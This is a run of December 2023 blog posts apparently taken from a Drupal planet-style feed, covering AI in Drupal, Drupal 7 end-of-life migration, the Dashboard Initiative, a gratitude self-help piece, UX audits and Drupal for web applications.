Image and Video Recognition:

  • Utilize AI for image and video recognition within Drupal.

  • Create modules that automatically tag and categorize media content based on AI analysis.

Data Analytics and Reporting:

  • Integrate AI for data analytics to extract meaningful insights from user interactions and website performance.

  • Develop Drupal modules that provide detailed analytics and reporting using AI algorithms.

Security Enhancements:

  • Implement AI-driven security measures to identify and prevent potential threats.

  • Develop modules that use AI to enhance website security by detecting and responding to malicious activities.

Automated Content Generation:

  • Use natural language processing (NLP) algorithms to automatically generate content.

  • Develop Drupal modules that assist in creating and optimizing content based on AI-generated suggestions.

When integrating AI into Drupal modules, it's important to consider factors such as data privacy, performance, and the specific requirements of the website. Additionally, leveraging existing AI libraries and frameworks can simplify the development process. Drupal's modular architecture makes it well-suited for incorporating AI functionalities into various aspects of a website.

What's Next for AI with Drupal?

As amazing and disruptive as today's LLMs are, they are only going to become faster and more capable as research continues.

It is hard to predict the rate at which LLM solutions will evolve because there may be unexpected bottlenecks; it may be that availability of computational resources will be the main limiting factor for how smart these LLMs can become.

However, it is safe to say that current and upcoming AI solutions will disrupt many aspects of business and technology, perhaps even more than the Internet did in the 1990s. In the same way that media companies evolved to leverage the Internet, AI will drive a similar evolution. 

While the future is not clearly mapped out, the time to embrace AI is now. 

Interested in architecting AI-powered solutions for your Drupal website? Promet is at the leading edge of exploring the potential and possibilities of AI for Drupal web development. Let’s talk!

Dec 07 2023

Here's the next part of our ongoing series dedicated to assisting Drupal 7 site owners in upgrading their websites to Drupal 10. There are many great reasons to upgrade. Modern Drupal offers powerful features for content editors, including customizable editorial workflows, a layout builder for your landing pages, a media library that makes managing and reusing media easier than ever, and more. Developers can make the most of these advancements.

In our previous blog post, we discussed using our questionnaire to develop a plan, understanding your budget, and deciding whether to work with a certified partner from our list or take the DIY approach for your migration. As we get closer to the start of 2024 and to Drupal 7 End of Life, it's crucial to consider the next phase. Now you need not only to secure your website's future but also to start mapping your information architecture and enhancing your content strategy. In this blog post, we'll explore what that means and why these steps are crucial as you prepare to transition away from Drupal 7.

Understanding Information Architecture and Content Strategy

These steps are vital to ensure a smooth transition to a new version. Mapping information architecture involves creating a blueprint of your website, showcasing where every piece of content is located and how it's interconnected, along with the key content types, views, and taxonomies crucial to your site. This matters because when you transition away from Drupal 7 to a new version, having a clear plan ensures that your website's structure remains organized. Such clarity helps prevent issues like data loss, broken links, and confusion for your website visitors.

Drupal offers tools and features empowering site builders and developers to create and manage a structured website tailored to your specific needs.

Additionally, when you assess your content strategy, you're essentially conducting a thorough review of the quality, relevance, and overall effectiveness of the content on your website. This is crucial during migration as it ensures your content remains valuable, fits the new platform's goals, improves user experience, and maintains or boosts SEO rankings. This preparation is vital for a smooth transition and to maintain the integrity of your content in the new setting.

To learn more about information architecture, explore the information architecture guide. For insights into content strategy, refer to this content strategy guide. For a comprehensive checklist when launching a website, visit the major version upgrade documentation.

Here are some recent sessions from DrupalCon worth exploring:

What does End of Life mean for you?

In software terms, End of Life means that the version of that software no longer receives feature updates, bug fixes, or security releases. This last point is the most important. If a security vulnerability is discovered after the end of life date, it may be publicly disclosed, and you will be unable to update your site to protect against the issue. For this reason, we recommend beginning to plan your migration now. 

Whether you want to take advantage of new functionalities with Drupal 10 or opt for another option, we’re here to support you. 

Visit our resource center to migrate from Drupal 7 now, and stay tuned for more blogs in our Drupal 7 End of Life series!

Dec 06 2023

Authored by: Nadiia Nykolaichuk

When logging in to a Drupal website, we all have different goals based on our specific responsibilities. Could each of us have a seamless journey through the admin UI, with no need for any extra steps, and with all the most relevant shortcuts at our fingertips? 

Adding a touch of personalization might be very helpful here, and that’s what the new Dashboard Initiative in Drupal is aimed at. Discover more details about the Initiative, as well as some other hot-from-the-oven features for Drupal’s administrative pages. All of those innovations clearly show that Drupal is gaining impressive momentum towards raising the usability of its admin interface sky-high.

Demystifying the Dashboard Initiative in Drupal

The key essence and the creation of the Initiative

The Dashboard Initiative is meant to provide different admin dashboards for different Drupal users based on the tasks they need to do. Dashboards will be the place for users to land on as soon as they log in to a Drupal website. There will be out-of-the-box dashboards in Drupal’s Standard profile, as well as unlimited customization options with the possibility to shape dashboards by adding blocks to them. 

The innovation was highlighted in an insightful session “So I logged in, now what? The Dashboard initiative welcomes you” by Drupal core contributors, Cristina Chumillas (ckrina) and Christian López Espínola (Penyaskito), both at Drupal Developer Days 2023 and DrupalCon Lille 2023. Our team was happy to attend the latter event where we noticed that the session was gaining traction, with the room fully crowded! 

The Initiative started at DrupalCon Prague last September when Cristina, who is also the Drupal core UX maintainer, shared her idea with Christian. Today, the Initiative’s team involves over a dozen great people, and more contributions are welcome. As is always the case with young Drupal initiatives, lots of things are subject to change and there are lots of issues to work on, but it’s so promising and brilliant that it’s worth spreading the word about.

What problems the Initiative aims to solve

The speakers outlined the following key problems:

  1. When a user logs in, they are redirected to the “/user” page telling them for how long they’ve been on the website, which is certainly not the most useful information.
  2. Thinking of a better option for a start page, it’s clear that, for example, the “/content” page would be great for content editors but useless for site builders. The point is that every user should start their journey at a completely different point based on the tasks they want to accomplish. 
  3. Even users working with content need to perform different actions with it. For example, they might want to see only the draft content. This requires extra steps in the admin UI, which could be eliminated thanks to personalized dashboards.
  4. Finally, there is no place in the Drupal admin interface to show site-wide communications with some important notifications, and that is the fourth problem the Dashboard Initiative should be able to solve.

A set of slides on the problems that the Dashboard Initiative is meant to solve.

The user personas

The Dashboard Initiative’s team started their work by defining the key user personas and what each of them wants to see. Just for a detailed explanation of what user personas are, you could check out our article based on the example of a university website’s students. 

So here are the 4 main personas the Dashboard Initiative relies on:

  1. Administrator
  2. Site Builder
  3. Content Editor
  4. Content Manager

A slide with the user personas for the Dashboard Initiative.

The Initiative’s team also needed to figure out the tasks for the user personas that would solve 80% of cases (not 100%, because each Drupal site was a completely different story, says Cristina Chumillas). They started by defining the behaviors, motivations, and frustrations of each user persona.

A slide with the behaviors, motivations, and frustrations defined for the “Site builder” user persona.

The MVP for the dashboards

The speakers presented an MVP for the Initiative with the basic tasks that the out-of-the-box dashboards should include. There is an MVP for two dashboards: 

  1. “Site administrator” (which unites the Administrator and the Site Builder personas)
  2. “Content user” (which unites the Content Editor and the Content Manager personas)

The default tasks in each dashboard depend on the modules installed on the website. For example, if the core multilingual functionality is enabled, the Content user’s dashboard will include a block with missing translations. Or, if the core Announcements Feed module is on — a new experimental module we mentioned in the article about what’s new on the way from Drupal 10 to Drupal 11 — the dashboards will include announcements.

A slide with the MVP for the “Site administrator” and “Content user” dashboards.

What’s under the hood?

According to Christian López Espínola, a dashboard will be just a configuration entity that stores references to blocks. It will be possible to enable or disable it as any other configuration entity. When this entity is not enabled, the administration experiences will start with the “/user” page as usual. In the future, when Dashboards become stable in the Drupal core, they should be enabled from the start.

Christian also explained that the dashboards are based on the front-end concept of progressive enhancement: “The idea is that we will have a dashboard that doesn’t depend on anything, but if you, for example, install the Layout Builder, then you’ll be able to customize the dashboard with the Layout Builder.”

If a website is not using Layout Builder, Drupal’s default page-building tool, it should be possible to create the dashboard blocks with other tools as well. That’s because the Initiative leads changed their initial plan to fully depend on the Layout Builder and decided instead to try to make the dashboards agnostic of the specific building tools.

A slide explaining that a dashboard is a config entity with blocks that can be built not only with Layout Builder but with other page building tools.

A demo of dashboards

The speakers also shared the demos of the dashboards from the point of view of the admin user that logs in to a Drupal website. This user sees two dashboards: the Default dashboard, which is the “Administration” dashboard, and the “Content Management” dashboard. They both have the “Edit layout” button at the top and sets of specific blocks.

Here are some of the blocks currently included in the “Administration” dashboard:

  • Recent comments 
  • Recent content
  • Cron status
  • Clear cache

A demo of the “Administration” dashboard.

Here are some of the blocks currently included in the “Content Management” dashboard:

  • My own drafts
  • Recent content
  • Recent comments

A demo of the “Content management” dashboard.

Permission-based dashboards

Initially, the team was planning to have role-based dashboards. However, according to Christian, users often wear multiple hats, which means that the same person can be a site builder, an admin, and a content editor on their website. So they decided to allow multiple dashboards to be available to the same user roles based on the customizable permissions. 

A slide showing that dashboards will be based on permissions.

So the People > Permissions page on a Drupal website will have permissions for the standard Drupal roles to do the following:

  • access specific dashboards
  • administer dashboards, which includes creating, editing, or deleting them (the Dashboard Initiative creators are planning to make the permissions more granular with time)

A slide showing the dashboard permissions.

The dashboard configuration page

There will be a special page in the Structure section of a Drupal website for dashboard configuration. It will list all the dashboards and enable you to reorder them by changing row weight or by drag-and-dropping, as well as edit them. If the Layout Builder is enabled, there are links to edit the dashboard layouts with its help.

A slide showing the dashboard configuration page.

Not brand-new: previous attempts to create a dashboard in Drupal

There already was an attempt in Drupal 7 to provide the Dashboard page in the administrative interface. It was the same for site builders, content editors, and other users. The page showed the “Who’s new” and  “Who’s online” blocks, offered a couple of administrative shortcuts to add or find content, and provided a search box for searching the website. 

A slide with Drupal 7’s attempt at having a dashboard.

According to Cristina, the Dashboard in Drupal 7 was actually a very good idea, but for whatever reason, the page didn’t end up the way it was planned, and many people even created ways to disable the page by default. That is why, when creating the new dashboards, the team did such serious preparation work figuring out what users might want to see there.

Other improvements to Drupal’s administrative interface

The Dashboard Initiative is not an isolated thing, explained Cristina at the session. Instead, it’s part of the roadmap to improve the overall usability of the Drupal administration interface.

A slide with other improvements to Drupal’s admin UI besides the dashboards.

Some other improvements are as follows:

  • Navigation modernization

It will become easier to navigate through Drupal’s UI thanks to layout redesign with the theme’s regions reorganized, the administrative toolbar revamped in accordance with the best UX patterns, and more. 

One of the most interesting innovations-in-progress for Drupal’s admin navigation is a new left-side content editor menu. It will accumulate all tasks that might be relevant for content creation/management, so those tasks will no longer be scattered across multiple admin sections.

A prototype of the new content management menu in Drupal.

  • Better field creation experiences

The workflows for creating fields and re-using existing ones are getting much more seamless for site builders. The interface for adding fields is being significantly revamped. It’s now possible to use new user-friendly buttons, view information about where the fields are used, and it is also planned to group the fields into categories for an easier selection process.

Field grouping for better field creation experiences.

  • Layout Builder improvements

The Layout Builder is also preparing for multiple improvements in the near future. The team is working on making the list of available blocks less overwhelming, the formatter settings or other configuration options more understandable for content editors, and the UI for selecting and editing blocks easier to use.

Reduced number of blocks in Layout Builder for better user experience.

Final thoughts

It looks like the vision of the old Drupal that used to be focused on developer experiences is vanishing into the past forever. Historically, a user-friendly interface wasn’t among Drupal’s strengths, but during recent years the CMS has been going through a complete metamorphosis, and the process is speeding up. All website owners need to do is catch up with all the fast innovation through regular website updates. Let customized dashboards and other administrative UI improvements genuinely elevate the experiences of all Drupal users!

Dec 06 2023
Laura Johnson

Senior Engineer

Primarily a backend developer, Laura also loves adding new cross-disciplinary skills to her collection, such as working with themes and frontend frameworks.

December 6, 2023

If your organization is still using Drupal 7 or later, migrating to an up-to-date platform for your website has been looming like a weight on your shoulders. The move to Drupal 10 isn’t easy. It requires a migration of your site and a full redesign to take advantage of the new tools the latest version offers.

Not only do you need someone to write that migration, but you also need to secure the budget to undertake a project like this. As you wait for the right time to get started, the weight of the deadline to begin your migration to Drupal 10 has only grown heavier. After multiple extensions, the Drupal community has set January 5, 2025 as the final end-of-life date for Drupal 7.

What does that mean for your organization? On the one hand, you now have just over a year to start planning a migration before your site loses crucial support. But on the other hand, as many organizations like yours face a similar deadline, you can’t afford to wait much longer. The time to make the move to Drupal 10 is now.

Why you need to start planning for a Drupal 10 migration

If you’ve fallen behind in migrating your site from Drupal 7, you’re not alone. According to the Drupal community, more than 350,000 projects still use that version of the platform as of November 2023 — one-quarter of all Drupal sites.

As a result, you aren’t just facing a hard deadline to relaunch your new site as January 2025 grows closer. You’re also competing with a vast number of organizations just like yours who need to coordinate the same migration with a web development agency partner. Given that it takes an average of six months to complete the sales process to get started on a Drupal 7 migration, you’re already at risk of missing the deadline if you have not yet contacted an agency.

The longer you wait, the less likely you are to find a team with availability to work with you on a migration plan and website redesign before Drupal 7 reaches end-of-life. And, given the stakes involved, your organization can’t afford the risks of sticking on a platform without the vital benefits of ongoing support.

What your organization loses when Drupal 7 reaches end-of-life

Drupal 7 will reach its end of life 14 years after its initial release. If you’re still on the platform, your website will remain accessible after January 5, 2025. However, it will no longer receive feature updates, bug fixes, or security releases from the Drupal community.

This last detail is most critical to your organization. Any security issues discovered after January 2025 may be publicly disclosed, but Drupal will no longer provide any necessary updates. Prior to the announcement of this final extension for Drupal 7, your organization had the option of paying for extended support. But that is no longer the case.

When you work with the right agency partner, you can create a migration plan that will keep your website secure. Fortunately, your organization will be able to better manage site security after the migration is complete. But that’s just one of the advantages made possible by getting your organization started with Drupal 10.

Drupal 10 offers dramatic advantages after migration

Trusting your site with the legacy code of Drupal 7 doesn’t just expose your organization to poor security. It prevents you from taking advantage of dramatic improvements for your site’s users and content editors.

Improved website speed and SEO performance

Fundamentally, your Drupal 10 website will run faster. Dynamic caching reduces page load times by invalidating only the content that has changed. Instead of needing to reload your entire page after a set amount of time, your cache can just reload the block with new information.

Drupal 10 also marks the end of Drupal 7’s jQuery. A large JavaScript library, jQuery was a powerful tool, but modern browsers perform many of the same functions. The up-to-date JavaScript used by Drupal 10 also decreases page load times.

Drupal 10 also supports new formats such as schema.org, Open Graph, and JSON-LD, which increase conversions from search engines. Plus, Drupal 10 supports advanced accessibility features that improve WCAG compliance and further improve SEO rankings.

Better site security and reduced maintenance costs

Drupal 10 improves your site security by including up-to-date protocols and dependencies such as PHP 8, Symfony 6, and CKEditor 5. As earlier versions of these dependencies reach end-of-life, they may be exposed to unpatched security vulnerabilities. Migrating to Drupal 10 avoids delays in getting critical security patches applied to your site.

One of Drupal’s major advantages as an open-source platform is the community’s Security Team, which delivers security advisories and provides guidance to contributed module maintainers on how to resolve potential vulnerabilities. Providing continued support from the community Security Team for all of your site’s contributed modules beyond the upgrade deadline is critical.

Improved content editing experience and efficiency

Drupal’s out-of-the-box CMS experience has always been limited. With Drupal 10, your site editors benefit from the Claro theme, which makes Drupal much easier to use. New image tools and an updated media library also enable better organization of your site’s assets.

Drupal 10 also includes the JavaScript text editor CKEditor 5, which further simplifies content creation and its accessibility. In addition, the platform offers enhanced translation capabilities in multiple languages, which enables your organization to reach a wider audience than ever.

Don’t wait until an emergency before moving to Drupal 10

Dec 06 2023

Introduction

This article explores the benefits of practicing gratitude and how to do it.

Yeah, I get it. Feeling grateful is far from easy. Life isn’t always fair. 

So many things go wrong every day.

But then, so many things go right, too.

It’s up to us how we perceive life—which parts of it we focus on, let into our minds.

It’s up to us to feel grateful for all we’ve got, or sorry for what we haven’t.

What’s Gratitude?

Gratitude is the feeling of being grateful—of the blessings and bounty one receives.

Many associate being grateful with grand acts and materials.

Reserving feeling thankful for those rare occasions when an act of kindness smacks them in the face with its sheer positive force. 

Like when a birthday present turns out to be the new iPhone.

And even then, people hesitate to express how grateful they feel. 

But here’s the truth.

One can be grateful for anything if they learn to see how it adds value to their lives. 

Value that may be material, but certainly not limited to it.

Does Practicing Gratitude Mean Giving Up On A Better Life?

There’s an existing notion that connects gratitude with a lack of drive.

For better, finer things in life. For a better life itself.

Being grateful doesn’t diminish one’s drive for a better life. It opens one’s eyes to life’s existing blessings—that make it fruitful, enjoyable, livable, here and now.

The gratitude attitude merely shifts the focus.

From constantly wanting more to appreciating what we already have.

Axelerant team members bonding over meetings

You can still aim for higher goals—while enjoying the present and celebrating past milestones.

Celebrating the resources, the people, the support that got you this far. 

You work towards the changeable, accept that some things can’t be changed, and count your blessings as they come.

What Have I Got To Be Grateful For?

It’s a question many struggle with. 

If you’re one of them, fret not. I’ve got just the thing for you.

An extensive questionnaire to ponder over by Dr. Joel Wong.

Cut yourself some slack if you can’t find reasons to be grateful right away.

Daily reflecting on events, people we cross paths with, things around us, is not taught as part of growing up.

So, we’re clueless about how our surroundings affect us—until the emotions are too strong, too on the face.

Anjali sleepy and getting a headache

Gratefulness hides in the sunny morning, a quiet thank you from a colleague, a deep conversation with a friend.

It hides in the smell of fresh coffee or a tight morning hug. Inside the coziness of a blanket in winter or the silly joke from kids.

You may think that these are too simple to feel grateful about. That they don’t count.

But here’s the thing: they do.

Axelerant team member Kanika making tea between breaks

What Are The Benefits Of Practicing Gratitude?

Practicing gratitude brings so many benefits to the body and mind. 

Not to mention relationships with people.

Even if you don’t realize that being grateful is making you healthier—it still does.

Benefits Of Gratitude On Your Mind And Emotions

Every situation has some advantages and disadvantages, every person some good habits and bad.

When we consciously practice being thankful for the good that comes to us from others, happiness and contentment follow.

Research shows practicing gratitude can lessen anxiety, stress, and help combat depression.

In fact, positive psychology researchers Martin Seligman and colleagues discovered that a single act of thoughtful gratitude produces an immediate 10% increase in happiness, and a 35% reduction in depressive symptoms.

Benefits Of Gratitude On Your Body

The link between thankfulness and actual physical benefits may be a little less conspicuous.

Practicing gratitude can:

Plus, if you count the reduction in stress, anxiety, and depression? It prevents lots of future diseases, too. 

Benefits Of Gratitude On Relationships

It’s common sense that practicing thankfulness in a relationship takes it to a whole new level.

Whether it’s a romantic or professional relationship, expressing gratitude strengthens the bond.

Studies show that even the innocent bystander, witness to an expression of gratitude between two people, will feel warmth and affinity towards them.

At work, a regular practice of expressing gratitude can build more robust teams and influence people’s decisions to remain in the organization.

Sucheta recognizing Axelerant and her team members for being there for her

According to a Great Place to Work Institute survey, recognition—not pay or perks—was the most powerful reason for people to produce great work.

How To Practice Gratitude?

Gratitude is a way of life. A powerfully positive one.

And to embrace it, you need practice.

Intellectual knowledge is only the first step towards real change.

Gratitude practice has four parts to it:

  • Notice
  • Think
  • Feel 
  • Do

In real life, some of these happen simultaneously and at a subconscious level when we feel thankful. 

But we want to be conscious about it while practicing.

Let’s take a small example to understand these stages.

Suppose you’ve been advised by your doctor to drink more water throughout the day.

But you keep forgetting about it at work. 

And a colleague takes it upon them to remind you whenever they can.

Notice

Don’t just gulp down water looking at the screen. 

Take a moment, and notice.

  • What was your friend doing when they reminded you to drink water?
  • Did they set aside their work to make sure you stay hydrated? 
  • Did they walk to your desk? Drop a message in your inbox? 

Notice their effort. 

You may find that reminders are not the only thing your colleague does for you.

Gradually, you’ll be able to notice all the other positive gestures that come your way from the people around you— and not just at work.

Think

Reflect on the impact of these reminders on your life.

James Clear, in his book Atomic Habits, mentions how small steps—unforgotten sips of water throughout the day, in this case—can create momentous differences.

These reminders help improve your health, work experience, productivity, and overall well-being.

(I’ve seen people faint and hospitalized from dehydration, because they couldn’t remember to drink enough water!) 

Feel

Once you notice and realize the impact of your colleague’s reminders, look within.

Allow yourself to feel the positive emotions that emerge.

Embrace that sense of thankfulness towards your colleague’s care for you. Towards the person.

Acknowledge their kindness and love expressed through these small gestures.

Do

It’s time to spread that goodness. Reciprocate.

Here’s where things get even more interesting—for you.

Research shows when you reflect and express gratitude, your brain releases dopamine and serotonin.

These chemicals make you feel good, happy, positive, and increase motivation and willpower.

Can you imagine? 

A simple, heartfelt thank-you note making your brain glow up with all the right chemicals?

Start Your Gratitude Practice Today

Experts believe practicing gratitude even once in a day is enough to reap its benefits.

The aim is to be genuine, honest, and specific about the subject of gratitude.

Here are a few things you can incorporate into your life:

  • Morning reflections: Start with a determination to be grateful for all the positive things that you receive. Tony Robbins calls this priming.
  • Gratitude journal: Dedicate a few minutes daily to jot down things you appreciate or moments that brought joy. This helps reinforce positive thoughts. It could be about a glimpse of a colorful bird at lunch break. Or a birthday gift you gave to yourself.
  • Express thankfulness: Verbally express your gratitude to someone who's helped you or made you feel good. It could be a colleague, family member, or a friend. You may send a written note, too.
  • Mindful appreciation: In the midst of life, as it unfolds every moment, be mindful about the little things that make your life enjoyable, beautiful. A good film, a conversation with a friend, a cup of tea, access to fresh water and air, machines to control temperature, blooming of a flower, etc. There are so many things that add value to our lives every day.
  • Evening recap: Note down three to five things you felt thankful for that day. This practice showed me that each day could be taken as a bad or a good day—depending on what you focus on at the end. Like childhood memories. 

Let’s spread the magic of gratitude one thanks at a time.

Dec 06 2023

Introduction

In 2016, Instagram went through a design overhaul with a surprising result.

Fueled by new features and a seamless mobile user experience, the social media platform doubled its user base in two years. User engagement and adoption further increased with the launch of “Stories,” a copy of a similar feature from Snapchat.

Such design overhauls should ideally be done after conducting a user experience audit. 

Daily active Instagram users stats

What Is A UX Audit?

A user experience (UX) audit is a thorough, data-driven evaluation of an app's or a website's user experience. It enables organizations to assess design choices and discover areas of improvement. This ensures alignment of the design with user needs and expectations.

We must design for the way people behave, not for how we would wish them to behave.

  Donald A. Norman, Co-Founder, Nielsen Norman Group

Why Do Organizations Need A UX Audit

Conducting a UX audit helps organizations in:

Identifying Usability Issues

A UX audit helps identify gaps in usability, which also translates to better performance, customer engagement, and conversion rates. 

For example, Amazon’s early stage website interface demonstrates everything that can go wrong with a website’s usability. This includes poor navigation, lack of familiarity, and visual clutter. 

The latest version of the Amazon website is an eCommerce success story, offering a much more intuitive interface. It provides easy navigation and personalized recommendations via advanced algorithms. Seamless mobile optimization and a simplified checkout process enhance user experience, making the interface user-friendly for shoppers.

Amazon's early stage website interface

Enhancing User Satisfaction

A UX audit helps organizations identify scope for design improvement in the major aspects of user delight. These include helpful error messages, legible text, and useful filters. Such elements make the experience seamless and delight users. This enhances user engagement and boosts customer loyalty.

User delighters in 2023

Reducing User Frustration

According to Deloitte’s Milliseconds Make Millions report, websites taking longer than 10 seconds lead to frustrated users. A UX audit helps identify similar areas of frustration across the user journey for better design decisions.

Customer reaction to slow loading e-commerce website

Streamlining Navigation

The Yale School Of Art website is a classic example of bad navigation. The complex menus, visual clutter, and unclear pathways make navigating the site difficult for visitors.

A UX audit helps outline navigation issues. This streamlines the user journey, resulting in efficient content discovery and better conversions.  

Yale school of Art - navigation

Identifying Accessibility Concerns

Accessibility is one of the integral parts of a great user experience. Without identifying and fixing accessibility issues early on, businesses may suffer losses. It may also lead to lawsuits. A UX audit helps organizations identify accessibility issues to comply with the regulations and reach a broader audience. 

ADA Title III Web Accessibility Lawsuits in Federal Court

Enhancing Competitive Advantage

Statistics from PwC state that 59% of US customers will abandon a brand they love after several bad experiences. A UX audit helps organizations set the stage for better user experience and gain a competitive advantage.  

For instance, the streaming app Netflix's dedication to a user-friendly interface and tailored content suggestions enhances the immersive streaming experience. This commitment to satisfying users and personalizing content has firmly established Netflix as a frontrunner in the fiercely competitive streaming industry.

Netflix user experience algorithm

How To Conduct A Basic UX Audit

Conducting a basic UX audit consists of the following steps.

Step 1: Understand The Business Goals 

Before conducting a UX audit, comprehend the business objectives associated with the product. Align the evaluation with the organization's goals, like increasing sales, brand visibility, or user engagement. This will guide the audit process, helping bring the focus on areas that directly impact these goals.

Step 2: Understand User Behavior

A deep dive into the user's perspective is the second step of a UX audit. Understanding how users interact with the product and what they aim to accomplish provides context for the evaluation and helps identify the scope for improvement.

Using various analytical tools for user behavior is a popular option.  

Tools such as Hotjar and Crazy Egg produce heatmaps that visually depict user clicks, movements, and time spent on a page. This visual information assists in identifying patterns, optimizing page layouts, and pinpointing elements that capture or divert user attention. 

Session recording tools such as Mouseflow and SessionCam permit UX experts to observe live user sessions, reveal user challenges, highlight navigation issues, and showcase user interactions with specific features.

Step 3: Perform Heuristic Usability Evaluation

Heuristic Usability Evaluation involves assessing the product against established design principles, like Nielsen's 10 heuristic design principles. This step puts businesses in the user's shoes and evaluates the product from their perspective.

The following table provides steps to conduct a heuristic evaluation.

Step | Description
Select Heuristic Principles | Identify and choose established usability heuristics (e.g., Nielsen's 10 Usability Heuristics) to serve as evaluation criteria.
Define Evaluation Criteria | Clearly articulate specific criteria for each selected heuristic to guide the evaluation process.
Choose Evaluators | Assemble a team of usability experts capable of impartially assessing the interface.
Provide Training | Conduct a briefing or training session to ensure evaluators understand the selected heuristics and their application.
Individual Evaluation | Each evaluator independently reviews the interface against chosen heuristics, noting violations or areas for improvement.
Record Findings | Document instances where the interface deviates from heuristics, using screenshots, annotations, or notes. Detailed notes and screenshots are taken to document challenges and pain points encountered during this evaluation.
Severity Rating | Assign severity ratings to identified issues based on their impact on user experience to prioritize improvements.
Consolidate Results | Collect and consolidate findings to create a comprehensive report detailing usability issues and their severity.
Debriefing Session | Convene a debriefing session with evaluators to discuss findings, share insights, and address discrepancies.
Prioritize Recommendations | Prioritize recommendations based on issue severity and potential impact on user experience. The heuristic evaluation process is iterative, with multiple rounds of assessment and improvement cycles to refine the interface.
Generate Actionable Insights | Transform evaluation findings into actionable insights, providing clear recommendations for interface improvement.

Step 4: Compile Findings And Make The Report

After the audit, findings from the heuristic evaluation and any data analysis are compiled into a comprehensive report. This report outlines the identified issues, categorizes them based on severity, and provides actionable recommendations for improvement. Accessibility concerns are also highlighted, along with suggestions for addressing these concerns.

Challenges In Conducting A UX Audit 

Before diving into a UX audit, it is important to note three of the most common challenges faced by organizations.

Defining Scope

The main challenge in a UX audit is setting clear project boundaries. A UX audit examines various aspects like functionality, usability, and aesthetics. But trying to uncover everything can be overwhelming. This can result in many findings that may not be practical. 

To prevent this, clearly defining the audit's purpose, goals, and deliverables is crucial. Involve stakeholders, set realistic expectations and deadlines, and prioritize addressing crucial issues and opportunities. For instance, on an ecommerce website, instead of evaluating all website features, focus on improving one critical feature, such as the checkout process.

Resistance To Change

A UX audit might propose changes demanding substantial resources, time, or effort. Some stakeholders or users might resist adopting these changes, driven by the fear of failure, lack of trust, misunderstandings, and technical hurdles.

Organizations can mitigate this challenge by engaging different departments in the UX audit process to bring diverse perspectives and expertise to the evaluation. It's also recommended to conduct workshops, courses, and training sessions on fundamental UX principles and best practices for the teams.

Gated Properties And Restricted Access

Restricted access in gated properties, marked by credential limitations, can disrupt digital workflows. It prevents teams from accessing specific areas of a website or app during a UX audit. 

For example, a delay in accessing critical content leads to further delays, miscommunications, and frustration. The solution is to treat UX audits as an iterative process, as this gives teams more time to deal with gated properties and restricted access.

How Axelerant Helped Implement Red Hat’s UX Audit  

Red Hat wanted to offer a fresh learning journey for developers, driven by seamless user experience. They approached Axelerant with two key challenges:

  • Restructuring the information architecture on the website for seamless user journeys  
  • Creating a roadmap for the portal’s business objectives through design

Backed by the Design Thinking and How Might We frameworks, the approach ensured that the portal would be able to solve user problems. It included a usability audit, information architecture and navigation redesign, and website redesign. 

This led to a more engaging developer portal with enhanced user experience.

A UX audit paves the way to frictionless user experience regardless of your organization’s scale. Not sure where to start? Talk to our experts and learn more.

Dec 06 2023

Meeting customer demands for personalized user experiences is paramount for businesses. To achieve this, adopting a mobile-first approach and ensuring swift responses becomes mission-critical. 

With users increasingly seeking engaging and interactive elements in their web experiences, organizations must choose a content management system (CMS) that aligns seamlessly with their requirements.  

Drupal is a preferred CMS for web application development, known for its open-source nature and high-security standards.

The Significance of Drupal in Web Application Development:

Drupal, an open-source and highly secure CMS, is pivotal in crafting robust web applications. Renowned brands like Johnson & Johnson, General Electric, and eBay trust Drupal development to deliver exceptional digital experiences. But why is Drupal the go-to choice for industry leaders in web application development? Let's delve into the reasons:

Unveiling the Power of Drupal: Why should you consider using Drupal to build a web application?

Drupal to build a web application

When organizations embark on web application development, they seek a content management platform that is secure, reliable, and flexible. As an open-source CMS platform, Drupal is the trusted choice for small-to-large organizations globally, including Nasdaq, Cisco, and Tesla. Its reputation for innovation and scalability is supported by community-driven code and a robust architecture tailored to meet enterprise requirements. 

Here's a closer look at why Drupal is an ideal choice for web application development in 2024:

Flexibility at its Core

Drupal provides a robust framework for creating precise web applications. With its core components and APIs, Drupal seamlessly accommodates complex web applications. The key lies in utilizing suitable modules to attain specific functionalities. Here are some crucial modules that help build a web application:

Module Name | Functionality
CONFIG SPLIT | This module plays a crucial role in defining the configuration sets to separate directories at the time of export and merge them at the time of import.
DIFF | Every time a new draft is created, this module offers a tab that reflects all the revisions and makes it easy to view all the words that have been added, modified, and deleted.
PATHAUTO | This module enables you to define specific patterns for content the moment it gets created. For example, in the case of a blog content type, this module automatically lets you add /blog in the URL.
ADMIN TOOLBAR | By elevating the administrative user experience, this module offers a drop-down menu that makes it easy to access the different administration pages.
REDIRECT | This module streamlines the redirect handling process in Drupal by automatically building a redirect for every content piece with an updated path.

Be it event registrations, insightful analytics, or interactive videos, Drupal has got you covered! You can also combine different modules according to your needs. Just like LEGO, Drupal empowers you with a myriad of blocks that allow you to build whatever you want.

Why is Drupal Flexible?

Drupal's flexibility extends beyond its core functionalities, with over 48,000 community-contributed modules. These modules offer plug-and-play functionality and help tailor web applications based on the specifications provided. From gaining insights through Google Analytics to ensuring GDPR compliance for cookies, Drupal has a dedicated module for every need.

Customer-centric user experience

Drupal simplifies the delivery of customer-focused experiences. 

It empowers organizations to create web applications that meet visitor needs, aiding informed decision-making. The user interface is meticulously crafted with the customer in mind, ensuring personalized and customer-centric interactions. The goal is to deliver a unique experience that fulfills users' specific needs throughout their journey.

Drupal web application development offers unparalleled flexibility, security, and a customer-centric approach, making it the ideal choice for organizations aiming to elevate their digital experiences.


A Success Story: Accelerating Web Development with Drupal

Empowering a Fortune 200 Life Sciences Company

A Fortune 200 Life Sciences Company engaged in groundbreaking R&D activities faced the challenge of creating a powerful multisite platform with an impeccable user interface. 

With over 400 companies under its umbrella, geographical diversity posed a unique challenge, necessitating a seamless web solution. After encountering challenges with a previous vendor regarding the technical intricacies of Drupal and Site Factory, the life sciences company turned to Axelerant for a solution. 

Their objectives included reducing launch times, achieving cost savings, and enhancing collaboration. Read how Axelerant leveraged the power of the Site Factory and Site Studio to develop a robust tool for delivering consistent brand experiences as well as personalized user journeys to their visitors.

How does Drupal deliver a customer-centric user experience?


Drupal is enriched with various built-in modules that make it an ideal CMS for the following factors:

Personalization Modules – Drupal boasts built-in modules, including Personalization Module, Commerce Recommender, and Browsing History Recommender, enabling tailored user experiences. 

Despite a preference for JavaScript-based solutions, Drupal's open-source options shine. Read how Axelerant seamlessly integrated Site Studio and the Context module to drive personalization in Drupal applications, offering a comprehensive solution.

Caching Optimization –  Drupal's Internal Page Caching and Internal Dynamic Page Cache modules elevate speed and page load efficiency. Anonymous visitors experience faster loading times as pages are cached intelligently, ensuring a smoother user experience.

